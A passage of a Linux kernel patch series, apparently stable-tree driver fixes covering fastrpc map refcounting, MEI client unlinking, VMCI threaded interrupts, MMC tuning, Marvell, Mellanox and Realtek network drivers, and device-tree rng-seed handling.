++++ b/drivers/infiniband/ulp/srp/ib_srp.h
+@@ -62,9 +62,6 @@ enum {
+ 	SRP_DEFAULT_CMD_SQ_SIZE = SRP_DEFAULT_QUEUE_SIZE - SRP_RSP_SQ_SIZE -
+ 				  SRP_TSK_MGMT_SQ_SIZE,
+ 
+-	SRP_TAG_NO_REQ		= ~0U,
+-	SRP_TAG_TSK_MGMT	= 1U << 31,
+-
+ 	SRP_MAX_PAGES_PER_MR	= 512,
+ 
+ 	SRP_MAX_ADD_CDB_LEN	= 16,
+@@ -79,6 +76,11 @@ enum {
+ 				  sizeof(struct srp_imm_buf),
+ };
+ 
++enum {
++	SRP_TAG_NO_REQ		= ~0U,
++	SRP_TAG_TSK_MGMT	= BIT(31),
++};
++
+ enum srp_target_state {
+ 	SRP_TARGET_SCANNING,
+ 	SRP_TARGET_LIVE,
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 7ff0b63c25e37..80811e852d8fd 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -316,6 +316,13 @@ static void fastrpc_free_map(struct kref *ref)
+ 		dma_buf_put(map->buf);
+ 	}
+ 
++	if (map->fl) {
++		spin_lock(&map->fl->lock);
++		list_del(&map->node);
++		spin_unlock(&map->fl->lock);
++		map->fl = NULL;
++	}
++
+ 	kfree(map);
+ }
+ 
+@@ -325,38 +332,41 @@ static void fastrpc_map_put(struct fastrpc_map *map)
+ 		kref_put(&map->refcount, fastrpc_free_map);
+ }
+ 
+-static void fastrpc_map_get(struct fastrpc_map *map)
++static int fastrpc_map_get(struct fastrpc_map *map)
+ {
+-	if (map)
+-		kref_get(&map->refcount);
++	if (!map)
++		return -ENOENT;
++
++	return kref_get_unless_zero(&map->refcount) ? 0 : -ENOENT;
+ }
+ 
+ 
+ static int fastrpc_map_lookup(struct fastrpc_user *fl, int fd,
+-			    struct fastrpc_map **ppmap)
++			    struct fastrpc_map **ppmap, bool take_ref)
+ {
++	struct fastrpc_session_ctx *sess = fl->sctx;
+ 	struct fastrpc_map *map = NULL;
++	int ret = -ENOENT;
+ 
+-	mutex_lock(&fl->mutex);
++	spin_lock(&fl->lock);
+ 	list_for_each_entry(map, &fl->maps, node) {
+-		if (map->fd == fd) {
+-			*ppmap = map;
+-			mutex_unlock(&fl->mutex);
+-			return 0;
+-		}
+-	}
+-	mutex_unlock(&fl->mutex);
+-
+-	return -ENOENT;
+-}
++		if (map->fd != fd)
++			continue;
+ 
+-static int fastrpc_map_find(struct fastrpc_user *fl, int fd,
+-			    struct fastrpc_map **ppmap)
+-{
+-	int ret = fastrpc_map_lookup(fl, fd, ppmap);
++		if (take_ref) {
++			ret = fastrpc_map_get(map);
++			if (ret) {
++				dev_dbg(sess->dev, "%s: Failed to get map fd=%d ret=%d\n",
++					__func__, fd, ret);
++				break;
++			}
++		}
+ 
+-	if (!ret)
+-		fastrpc_map_get(*ppmap);
++		*ppmap = map;
++		ret = 0;
++		break;
++	}
++	spin_unlock(&fl->lock);
+ 
+ 	return ret;
+ }
+@@ -703,7 +713,7 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ 	struct fastrpc_map *map = NULL;
+ 	int err = 0;
+ 
+-	if (!fastrpc_map_find(fl, fd, ppmap))
++	if (!fastrpc_map_lookup(fl, fd, ppmap, true))
+ 		return 0;
+ 
+ 	map = kzalloc(sizeof(*map), GFP_KERNEL);
+@@ -1026,7 +1036,7 @@ static int fastrpc_put_args(struct fastrpc_invoke_ctx *ctx,
+ 	for (i = 0; i < FASTRPC_MAX_FDLIST; i++) {
+ 		if (!fdlist[i])
+ 			break;
+-		if (!fastrpc_map_lookup(fl, (int)fdlist[i], &mmap))
++		if (!fastrpc_map_lookup(fl, (int)fdlist[i], &mmap, false))
+ 			fastrpc_map_put(mmap);
+ 	}
+ 
+@@ -1265,12 +1275,7 @@ err_invoke:
+ 	fl->init_mem = NULL;
+ 	fastrpc_buf_free(imem);
+ err_alloc:
+-	if (map) {
+-		spin_lock(&fl->lock);
+-		list_del(&map->node);
+-		spin_unlock(&fl->lock);
+-		fastrpc_map_put(map);
+-	}
++	fastrpc_map_put(map);
+ err:
+ 	kfree(args);
+ 
+@@ -1346,10 +1351,8 @@ static int fastrpc_device_release(struct inode *inode, struct file *file)
+ 		fastrpc_context_put(ctx);
+ 	}
+ 
+-	list_for_each_entry_safe(map, m, &fl->maps, node) {
+-		list_del(&map->node);
++	list_for_each_entry_safe(map, m, &fl->maps, node)
+ 		fastrpc_map_put(map);
+-	}
+ 
+ 	list_for_each_entry_safe(buf, b, &fl->mmaps, node) {
+ 		list_del(&buf->node);
+diff --git a/drivers/misc/mei/bus.c b/drivers/misc/mei/bus.c
+index 46aa3554e97b0..7b7f4190cd023 100644
+--- a/drivers/misc/mei/bus.c
++++ b/drivers/misc/mei/bus.c
+@@ -665,13 +665,15 @@ void *mei_cldev_dma_map(struct mei_cl_device *cldev, u8 buffer_id, size_t size)
+ 	if (cl->state == MEI_FILE_UNINITIALIZED) {
+ 		ret = mei_cl_link(cl);
+ 		if (ret)
+-			goto out;
++			goto notlinked;
+ 		/* update pointers */
+ 		cl->cldev = cldev;
+ 	}
+ 
+ 	ret = mei_cl_dma_alloc_and_map(cl, NULL, buffer_id, size);
+-out:
++	if (ret)
++		mei_cl_unlink(cl);
++notlinked:
+ 	mutex_unlock(&bus->device_lock);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+@@ -721,7 +723,7 @@ int mei_cldev_enable(struct mei_cl_device *cldev)
+ 	if (cl->state == MEI_FILE_UNINITIALIZED) {
+ 		ret = mei_cl_link(cl);
+ 		if (ret)
+-			goto out;
++			goto notlinked;
+ 		/* update pointers */
+ 		cl->cldev = cldev;
+ 	}
+@@ -748,6 +750,9 @@ int mei_cldev_enable(struct mei_cl_device *cldev)
+ 	}
+ 
+ out:
++	if (ret)
++		mei_cl_unlink(cl);
++notlinked:
+ 	mutex_unlock(&bus->device_lock);
+ 
+ 	return ret;
+@@ -1115,7 +1120,6 @@ static void mei_cl_bus_dev_release(struct device *dev)
+ 	mei_cl_flush_queues(cldev->cl, NULL);
+ 	mei_me_cl_put(cldev->me_cl);
+ 	mei_dev_bus_put(cldev->bus);
+-	mei_cl_unlink(cldev->cl);
+ 	kfree(cldev->cl);
+ 	kfree(cldev);
+ }
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index 99966cd3e7d89..bdc65d50b945f 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -111,6 +111,8 @@
+ 
+ #define MEI_DEV_ID_RPL_S      0x7A68  /* Raptor Lake Point S */
+ 
++#define MEI_DEV_ID_MTL_M      0x7E70  /* Meteor Lake Point M */
++
+ /*
+  * MEI HW Section
+  */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index 704cd0caa172c..5bf0d50d55a00 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -118,6 +118,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
+ 
++	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
++
+ 	/* required last entry */
+ 	{0, }
+ };
+diff --git a/drivers/misc/vmw_vmci/vmci_guest.c b/drivers/misc/vmw_vmci/vmci_guest.c
+index aa7b05de97dd5..4f8d962bb5b2a 100644
+--- a/drivers/misc/vmw_vmci/vmci_guest.c
++++ b/drivers/misc/vmw_vmci/vmci_guest.c
+@@ -56,8 +56,6 @@ struct vmci_guest_device {
+ 
+ 	bool exclusive_vectors;
+ 
+-	struct tasklet_struct datagram_tasklet;
+-	struct tasklet_struct bm_tasklet;
+ 	struct wait_queue_head inout_wq;
+ 
+ 	void *data_buffer;
+@@ -304,9 +302,8 @@ static int vmci_check_host_caps(struct pci_dev *pdev)
+  * This function assumes that it has exclusive access to the data
+  * in register(s) for the duration of the call.
+  */
+-static void vmci_dispatch_dgs(unsigned long data)
++static void vmci_dispatch_dgs(struct vmci_guest_device *vmci_dev)
+ {
+-	struct vmci_guest_device *vmci_dev = (struct vmci_guest_device *)data;
+ 	u8 *dg_in_buffer = vmci_dev->data_buffer;
+ 	struct vmci_datagram *dg;
+ 	size_t dg_in_buffer_size = VMCI_MAX_DG_SIZE;
+@@ -465,10 +462,8 @@ static void vmci_dispatch_dgs(unsigned long data)
+  * Scans the notification bitmap for raised flags, clears them
+  * and handles the notifications.
+  */
+-static void vmci_process_bitmap(unsigned long data)
++static void vmci_process_bitmap(struct vmci_guest_device *dev)
+ {
+-	struct vmci_guest_device *dev = (struct vmci_guest_device *)data;
+-
+ 	if (!dev->notification_bitmap) {
+ 		dev_dbg(dev->dev, "No bitmap present in %s\n", __func__);
+ 		return;
+@@ -486,13 +481,13 @@ static irqreturn_t vmci_interrupt(int irq, void *_dev)
+ 	struct vmci_guest_device *dev = _dev;
+ 
+ 	/*
+-	 * If we are using MSI-X with exclusive vectors then we simply schedule
+-	 * the datagram tasklet, since we know the interrupt was meant for us.
++	 * If we are using MSI-X with exclusive vectors then we simply call
++	 * vmci_dispatch_dgs(), since we know the interrupt was meant for us.
+ 	 * Otherwise we must read the ICR to determine what to do.
+ 	 */
+ 
+ 	if (dev->exclusive_vectors) {
+-		tasklet_schedule(&dev->datagram_tasklet);
++		vmci_dispatch_dgs(dev);
+ 	} else {
+ 		unsigned int icr;
+ 
+@@ -502,12 +497,12 @@ static irqreturn_t vmci_interrupt(int irq, void *_dev)
+ 			return IRQ_NONE;
+ 
+ 		if (icr & VMCI_ICR_DATAGRAM) {
+-			tasklet_schedule(&dev->datagram_tasklet);
++			vmci_dispatch_dgs(dev);
+ 			icr &= ~VMCI_ICR_DATAGRAM;
+ 		}
+ 
+ 		if (icr & VMCI_ICR_NOTIFICATION) {
+-			tasklet_schedule(&dev->bm_tasklet);
++			vmci_process_bitmap(dev);
+ 			icr &= ~VMCI_ICR_NOTIFICATION;
+ 		}
+ 
+@@ -536,7 +531,7 @@ static irqreturn_t vmci_interrupt_bm(int irq, void *_dev)
+ 	struct vmci_guest_device *dev = _dev;
+ 
+ 	/* For MSI-X we can just assume it was meant for us. */
+-	tasklet_schedule(&dev->bm_tasklet);
++	vmci_process_bitmap(dev);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -638,10 +633,6 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	vmci_dev->iobase = iobase;
+ 	vmci_dev->mmio_base = mmio_base;
+ 
+-	tasklet_init(&vmci_dev->datagram_tasklet,
+-		     vmci_dispatch_dgs, (unsigned long)vmci_dev);
+-	tasklet_init(&vmci_dev->bm_tasklet,
+-		     vmci_process_bitmap, (unsigned long)vmci_dev);
+ 	init_waitqueue_head(&vmci_dev->inout_wq);
+ 
+ 	if (mmio_base != NULL) {
+@@ -808,8 +799,9 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	 * Request IRQ for legacy or MSI interrupts, or for first
+ 	 * MSI-X vector.
+ 	 */
+-	error = request_irq(pci_irq_vector(pdev, 0), vmci_interrupt,
+-			    IRQF_SHARED, KBUILD_MODNAME, vmci_dev);
++	error = request_threaded_irq(pci_irq_vector(pdev, 0), NULL,
++				     vmci_interrupt, IRQF_SHARED,
++				     KBUILD_MODNAME, vmci_dev);
+ 	if (error) {
+ 		dev_err(&pdev->dev, "Irq %u in use: %d\n",
+ 			pci_irq_vector(pdev, 0), error);
+@@ -823,9 +815,9 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	 * between the vectors.
+ 	 */
+ 	if (vmci_dev->exclusive_vectors) {
+-		error = request_irq(pci_irq_vector(pdev, 1),
+-				    vmci_interrupt_bm, 0, KBUILD_MODNAME,
+-				    vmci_dev);
++		error = request_threaded_irq(pci_irq_vector(pdev, 1), NULL,
++					     vmci_interrupt_bm, 0,
++					     KBUILD_MODNAME, vmci_dev);
+ 		if (error) {
+ 			dev_err(&pdev->dev,
+ 				"Failed to allocate irq %u: %d\n",
+@@ -833,9 +825,11 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 			goto err_free_irq;
+ 		}
+ 		if (caps_in_use & VMCI_CAPS_DMA_DATAGRAM) {
+-			error = request_irq(pci_irq_vector(pdev, 2),
+-					    vmci_interrupt_dma_datagram,
+-					    0, KBUILD_MODNAME, vmci_dev);
++			error = request_threaded_irq(pci_irq_vector(pdev, 2),
++						     NULL,
++						    vmci_interrupt_dma_datagram,
++						     0, KBUILD_MODNAME,
++						     vmci_dev);
+ 			if (error) {
+ 				dev_err(&pdev->dev,
+ 					"Failed to allocate irq %u: %d\n",
+@@ -871,8 +865,6 @@ err_free_bm_irq:
+ 
+ err_free_irq:
+ 	free_irq(pci_irq_vector(pdev, 0), vmci_dev);
+-	tasklet_kill(&vmci_dev->datagram_tasklet);
+-	tasklet_kill(&vmci_dev->bm_tasklet);
+ 
+ err_disable_msi:
+ 	pci_free_irq_vectors(pdev);
+@@ -943,9 +935,6 @@ static void vmci_guest_remove_device(struct pci_dev *pdev)
+ 	free_irq(pci_irq_vector(pdev, 0), vmci_dev);
+ 	pci_free_irq_vectors(pdev);
+ 
+-	tasklet_kill(&vmci_dev->datagram_tasklet);
+-	tasklet_kill(&vmci_dev->bm_tasklet);
+-
+ 	if (vmci_dev->notification_bitmap) {
+ 		/*
+ 		 * The device reset above cleared the bitmap state of the
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index ffeb5759830ff..8c62c3fba75e8 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -107,6 +107,7 @@
+ #define ESDHC_TUNING_START_TAP_DEFAULT	0x1
+ #define ESDHC_TUNING_START_TAP_MASK	0x7f
+ #define ESDHC_TUNING_CMD_CRC_CHECK_DISABLE	(1 << 7)
++#define ESDHC_TUNING_STEP_DEFAULT	0x1
+ #define ESDHC_TUNING_STEP_MASK		0x00070000
+ #define ESDHC_TUNING_STEP_SHIFT		16
+ 
+@@ -1361,7 +1362,7 @@ static void sdhci_esdhc_imx_hwinit(struct sdhci_host *host)
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct pltfm_imx_data *imx_data = sdhci_pltfm_priv(pltfm_host);
+ 	struct cqhci_host *cq_host = host->mmc->cqe_private;
+-	int tmp;
++	u32 tmp;
+ 
+ 	if (esdhc_is_usdhc(imx_data)) {
+ 		/*
+@@ -1416,17 +1417,24 @@ static void sdhci_esdhc_imx_hwinit(struct sdhci_host *host)
+ 
+ 		if (imx_data->socdata->flags & ESDHC_FLAG_STD_TUNING) {
+ 			tmp = readl(host->ioaddr + ESDHC_TUNING_CTRL);
+-			tmp |= ESDHC_STD_TUNING_EN |
+-				ESDHC_TUNING_START_TAP_DEFAULT;
+-			if (imx_data->boarddata.tuning_start_tap) {
+-				tmp &= ~ESDHC_TUNING_START_TAP_MASK;
++			tmp |= ESDHC_STD_TUNING_EN;
++
++			/*
++			 * ROM code or bootloader may config the start tap
++			 * and step, unmask them first.
++			 */
++			tmp &= ~(ESDHC_TUNING_START_TAP_MASK | ESDHC_TUNING_STEP_MASK);
++			if (imx_data->boarddata.tuning_start_tap)
+ 				tmp |= imx_data->boarddata.tuning_start_tap;
+-			}
++			else
++				tmp |= ESDHC_TUNING_START_TAP_DEFAULT;
+ 
+ 			if (imx_data->boarddata.tuning_step) {
+-				tmp &= ~ESDHC_TUNING_STEP_MASK;
+ 				tmp |= imx_data->boarddata.tuning_step
+ 					<< ESDHC_TUNING_STEP_SHIFT;
++			} else {
++				tmp |= ESDHC_TUNING_STEP_DEFAULT
++					<< ESDHC_TUNING_STEP_SHIFT;
+ 			}
+ 
+ 			/* Disable the CMD CRC check for tuning, if not, need to
+diff --git a/drivers/mmc/host/sunxi-mmc.c b/drivers/mmc/host/sunxi-mmc.c
+index b16e12e62e722..3db9f32d6a7b9 100644
+--- a/drivers/mmc/host/sunxi-mmc.c
++++ b/drivers/mmc/host/sunxi-mmc.c
+@@ -1492,9 +1492,11 @@ static int sunxi_mmc_remove(struct platform_device *pdev)
+ 	struct sunxi_mmc_host *host = mmc_priv(mmc);
+ 
+ 	mmc_remove_host(mmc);
+-	pm_runtime_force_suspend(&pdev->dev);
+-	disable_irq(host->irq);
+-	sunxi_mmc_disable(host);
++	pm_runtime_disable(&pdev->dev);
++	if (!pm_runtime_status_suspended(&pdev->dev)) {
++		disable_irq(host->irq);
++		sunxi_mmc_disable(host);
++	}
+ 	dma_free_coherent(&pdev->dev, PAGE_SIZE, host->sg_cpu, host->sg_dma);
+ 	mmc_free_host(mmc);
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index fa8029a940689..eb25e458266ca 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -589,7 +589,7 @@ int rvu_mbox_handler_mcs_free_resources(struct rvu *rvu,
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	struct mcs_rsrc_map *map;
+ 	struct mcs *mcs;
+-	int rc;
++	int rc = 0;
+ 
+ 	if (req->mcs_id >= rvu->mcs_blk_cnt)
+ 		return MCS_AF_ERR_INVALID_MCSID;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 88f8772a61cd5..8a41ad8ca04f1 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -1012,7 +1012,6 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 	rbpool = cq->rbpool;
+ 	free_ptrs = cq->pool_ptrs;
+ 
+-	get_cpu();
+ 	while (cq->pool_ptrs) {
+ 		if (otx2_alloc_rbuf(pfvf, rbpool, &bufptr)) {
+ 			/* Schedule a WQ if we fails to free atleast half of the
+@@ -1032,7 +1031,6 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 		pfvf->hw_ops->aura_freeptr(pfvf, qidx, bufptr + OTX2_HEAD_ROOM);
+ 		cq->pool_ptrs--;
+ 	}
+-	put_cpu();
+ 	cq->refill_task_sched = false;
+ }
+ 
+@@ -1370,7 +1368,6 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
+-	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+@@ -1394,7 +1391,6 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	}
+ 
+ err_mem:
+-	put_cpu();
+ 	return err ? -ENOMEM : 0;
+ 
+ fail:
+@@ -1435,21 +1431,18 @@ int otx2_rq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
+-	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (pool_id = 0; pool_id < hw->rqpool_cnt; pool_id++) {
+ 		pool = &pfvf->qset.pool[pool_id];
+ 		for (ptr = 0; ptr < num_ptrs; ptr++) {
+ 			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
+ 			if (err)
+-				goto err_mem;
++				return -ENOMEM;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id,
+ 						   bufptr + OTX2_HEAD_ROOM);
+ 		}
+ 	}
+-err_mem:
+-	put_cpu();
+-	return err ? -ENOMEM : 0;
++	return 0;
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 67aa02bb2b85c..712715a49d201 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -733,8 +733,10 @@ static inline void cn10k_aura_freeptr(void *dev, int aura, u64 buf)
+ 	u64 ptrs[2];
+ 
+ 	ptrs[1] = buf;
++	get_cpu();
+ 	/* Free only one buffer at time during init and teardown */
+ 	__cn10k_aura_freeptr(pfvf, aura, ptrs, 2);
++	put_cpu();
+ }
+ 
+ /* Alloc pointer from pool/aura */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 96417c5feed76..879555ba847dd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -677,6 +677,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 	mutex_lock(&dev->intf_state_mutex);
+ 	if (test_bit(MLX5_DROP_NEW_HEALTH_WORK, &health->flags)) {
+ 		mlx5_core_err(dev, "health works are not permitted at this stage\n");
++		mutex_unlock(&dev->intf_state_mutex);
+ 		return;
+ 	}
+ 	mutex_unlock(&dev->intf_state_mutex);
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index fe8dc8e0522b0..cabed1b7b45ed 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -2207,28 +2207,6 @@ static int rtl_set_mac_address(struct net_device *dev, void *p)
+ 	return 0;
+ }
+ 
+-static void rtl_wol_enable_rx(struct rtl8169_private *tp)
+-{
+-	if (tp->mac_version >= RTL_GIGA_MAC_VER_25)
+-		RTL_W32(tp, RxConfig, RTL_R32(tp, RxConfig) |
+-			AcceptBroadcast | AcceptMulticast | AcceptMyPhys);
+-}
+-
+-static void rtl_prepare_power_down(struct rtl8169_private *tp)
+-{
+-	if (tp->dash_type != RTL_DASH_NONE)
+-		return;
+-
+-	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
+-	    tp->mac_version == RTL_GIGA_MAC_VER_33)
+-		rtl_ephy_write(tp, 0x19, 0xff64);
+-
+-	if (device_may_wakeup(tp_to_dev(tp))) {
+-		phy_speed_down(tp->phydev, false);
+-		rtl_wol_enable_rx(tp);
+-	}
+-}
+-
+ static void rtl_init_rxcfg(struct rtl8169_private *tp)
+ {
+ 	switch (tp->mac_version) {
+@@ -2452,6 +2430,31 @@ static void rtl_enable_rxdvgate(struct rtl8169_private *tp)
+ 	rtl_wait_txrx_fifo_empty(tp);
+ }
+ 
++static void rtl_wol_enable_rx(struct rtl8169_private *tp)
++{
++	if (tp->mac_version >= RTL_GIGA_MAC_VER_25)
++		RTL_W32(tp, RxConfig, RTL_R32(tp, RxConfig) |
++			AcceptBroadcast | AcceptMulticast | AcceptMyPhys);
++
++	if (tp->mac_version >= RTL_GIGA_MAC_VER_40)
++		rtl_disable_rxdvgate(tp);
++}
++
++static void rtl_prepare_power_down(struct rtl8169_private *tp)
++{
++	if (tp->dash_type != RTL_DASH_NONE)
++		return;
++
++	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
++	    tp->mac_version == RTL_GIGA_MAC_VER_33)
++		rtl_ephy_write(tp, 0x19, 0xff64);
++
++	if (device_may_wakeup(tp_to_dev(tp))) {
++		phy_speed_down(tp->phydev, false);
++		rtl_wol_enable_rx(tp);
++	}
++}
++
+ static void rtl_set_tx_config_registers(struct rtl8169_private *tp)
+ {
+ 	u32 val = TX_DMA_BURST << TxDMAShift |
+@@ -3869,7 +3872,7 @@ static void rtl8169_tx_clear(struct rtl8169_private *tp)
+ 	netdev_reset_queue(tp->dev);
+ }
+ 
+-static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
++static void rtl8169_cleanup(struct rtl8169_private *tp)
+ {
+ 	napi_disable(&tp->napi);
+ 
+@@ -3881,9 +3884,6 @@ static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
+ 
+ 	rtl_rx_close(tp);
+ 
+-	if (going_down && tp->dev->wol_enabled)
+-		goto no_reset;
+-
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_28:
+ 	case RTL_GIGA_MAC_VER_31:
+@@ -3904,7 +3904,7 @@ static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
+ 	}
+ 
+ 	rtl_hw_reset(tp);
+-no_reset:
++
+ 	rtl8169_tx_clear(tp);
+ 	rtl8169_init_ring_indexes(tp);
+ }
+@@ -3915,7 +3915,7 @@ static void rtl_reset_work(struct rtl8169_private *tp)
+ 
+ 	netif_stop_queue(tp->dev);
+ 
+-	rtl8169_cleanup(tp, false);
++	rtl8169_cleanup(tp);
+ 
+ 	for (i = 0; i < NUM_RX_DESC; i++)
+ 		rtl8169_mark_to_asic(tp->RxDescArray + i);
+@@ -4601,7 +4601,7 @@ static void rtl8169_down(struct rtl8169_private *tp)
+ 	pci_clear_master(tp->pci_dev);
+ 	rtl_pci_commit(tp);
+ 
+-	rtl8169_cleanup(tp, true);
++	rtl8169_cleanup(tp);
+ 	rtl_disable_exit_l1(tp);
+ 	rtl_prepare_power_down(tp);
+ }
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 5630f6e718e12..067ea019b110a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -1218,7 +1218,7 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo)
+ 				BRCMF_NROF_H2D_COMMON_MSGRINGS;
+ 		max_completionrings = BRCMF_NROF_D2H_COMMON_MSGRINGS;
+ 	}
+-	if (max_flowrings > 256) {
++	if (max_flowrings > 512) {
+ 		brcmf_err(bus, "invalid max_flowrings(%d)\n", max_flowrings);
+ 		return -EIO;
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index e6d64152c81a7..a02e5a67b7066 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -1106,6 +1106,11 @@ int iwl_read_ppag_table(struct iwl_fw_runtime *fwrt, union iwl_ppag_table_cmd *c
+         int i, j, num_sub_bands;
+         s8 *gain;
+ 
++	/* many firmware images for JF lie about this */
++	if (CSR_HW_RFID_TYPE(fwrt->trans->hw_rf_id) ==
++	    CSR_HW_RFID_TYPE(CSR_HW_RF_ID_TYPE_JF))
++		return -EOPNOTSUPP;
++
+         if (!fw_has_capa(&fwrt->fw->ucode_capa, IWL_UCODE_TLV_CAPA_SET_PPAG)) {
+                 IWL_DEBUG_RADIO(fwrt,
+                                 "PPAG capability not supported by FW, command not sent.\n");
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index 4f88e8bbdd279..f08b25195ae79 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -1163,18 +1163,32 @@ int __init early_init_dt_scan_chosen(char *cmdline)
+ 	if (node < 0)
+ 		node = fdt_path_offset(fdt, "/chosen@0");
+ 	if (node < 0)
+-		return -ENOENT;
++		/* Handle the cmdline config options even if no /chosen node */
++		goto handle_cmdline;
+ 
+ 	chosen_node_offset = node;
+ 
+ 	early_init_dt_check_for_initrd(node);
+ 	early_init_dt_check_for_elfcorehdr(node);
+ 
++	rng_seed = of_get_flat_dt_prop(node, "rng-seed", &l);
++	if (rng_seed && l > 0) {
++		add_bootloader_randomness(rng_seed, l);
++
++		/* try to clear seed so it won't be found. */
++		fdt_nop_property(initial_boot_params, node, "rng-seed");
++
++		/* update CRC check value */
++		of_fdt_crc32 = crc32_be(~0, initial_boot_params,
++				fdt_totalsize(initial_boot_params));
++	}
++
+ 	/* Retrieve command line */
+ 	p = of_get_flat_dt_prop(node, "bootargs", &l);
+ 	if (p != NULL && l > 0)
+ 		strscpy(cmdline, p, min(l, COMMAND_LINE_SIZE));
+ 
++handle_cmdline:
+ 	/*
+ 	 * CONFIG_CMDLINE is meant to be a default in case nothing else
+ 	 * managed to set the command line, unless CONFIG_CMDLINE_FORCE
+@@ -1195,18 +1209,6 @@ int __init early_init_dt_scan_chosen(char *cmdline)
+ 
+ 	pr_debug("Command line is: %s\n", (char *)cmdline);
+ 
+-	rng_seed = of_get_flat_dt_prop(node, "rng-seed", &l);
+-	if (rng_seed && l > 0) {
+-		add_bootloader_randomness(rng_seed, l);
+-
+-		/* try to clear seed so it won't be found. */
+-		fdt_nop_property(initial_boot_params, node, "rng-seed");
+-
+-		/* update CRC check value */
+-		of_fdt_crc32 = crc32_be(~0, initial_boot_params,
+-				fdt_totalsize(initial_boot_params));
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/soc/qcom/apr.c b/drivers/soc/qcom/apr.c
+index cd44f17dad3d0..d51abb462ae5d 100644
+--- a/drivers/soc/qcom/apr.c
++++ b/drivers/soc/qcom/apr.c
+@@ -461,9 +461,10 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 		goto out;
+ 	}
+ 
++	/* Protection domain is optional, it does not exist on older platforms */
